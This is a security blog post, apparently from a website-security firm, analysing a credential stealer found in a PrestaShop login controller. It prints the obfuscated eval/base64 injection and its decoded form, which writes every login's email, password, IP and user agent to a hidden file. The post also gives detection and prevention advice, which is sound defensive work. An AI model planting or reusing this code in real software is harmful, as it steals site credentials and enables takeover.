In a compromised environment, attackers may inject malicious code into different files, including the core of different CMSs, in order to maintain access to the website and/or obtain sensitive data. Although these issues are very simple to be identified and remediated, not all users constantly monitor their websites for such file integrity breaches.
One of these injections is known as credential stealer, which consists of intercepting the authentication mechanism and saving the username/password either into a file or sending it via email to the attacker.
During an Incident Response process, we found a malware of this category injected in the Prestashop file “./controllers/AuthController.php”. Here is the snippet:
if (Tools::isSubmit('SubmitLogin')) { Module::hookExec('beforeAuthentication'); $passwd = trim(Tools::getValue('passwd')); $email = trim(Tools::getValue('email')); if (empty($email)) $this->errors[] = Tools::displayError('E-mail address required');... elseif (Tools::strlen($passwd) > 32) $this->errors[] = Tools::displayError('Password is too long'); elseif (!Validate::isPasswd($passwd)) $this->errors[] = Tools::displayError('Invalid password'); else {strong>eval(gzinflate(base64_decode('bY7fCoIwHIXvBd9BfnihIL5AJkiuuilj2R+IGGYbLsyNzVDI3j016Kbuzsf5OBzOHPao8pqLitCW61o7wISkFbju0zRsJqcjOhDdsnYmqlqJsqTKl4UEDzJwJ6bBGsVr6vHSB6vrLPBtmWndXL9ItgjvET7BMk035EjmCT5EOEbxkOD862G0SlJEojj+W48zu55ItEDrdFCCiwqDQoWfZ3kp9PhsoNcb'))); $customer = new Customer(); $authentication = $customer->getByEmail(trim($email), trim($passwd)); if (!$authentication OR !$customer->id)
]
The obfuscation code is a very common technique used by attackers to hide the malicious code, but most scanners will trigger an alert for files containing a combination of eval() and base64_decode() string.
When decoding it, we could see the following snippet:
if(function_exists("fopen")){$fp=fopen("AjaxController.php","a");fwrite($fp, $email." || ".$passwd." || ".$_SERVER["HTTP_X_FORWARDED_FOR"]." || ".$_SERVER["REMOTE_ADDR"]." || ".$_SERVER["HTTP_USER_AGENT"]."<br><hr>");fclose($fp);}
The code above will run whenever a user tries to authenticate on Prestashop’s backend, dumping sensitive data, such as email, password, IP address and user agent into the file AjaxController.php.
From there, all the attacker has to do is download this file to get a list of credentials and take control over the site to create bogus users, change payment info, and/or perform all different kinds of malicious activities.
On a previous blog post about another credential stealer, we showed how an attacker can send stolen credentials to an email address. The case described in this article though tends to be simpler and more reliable because there’s no need for an email account in order to be successful.
To prevent such attacks, keep your Prestashop site and modules always up to date and remember to monitor your core files. If you suspect that your site has been compromised and needs specialized assistance, our security analyst at https://sucuri.net will be glad to help.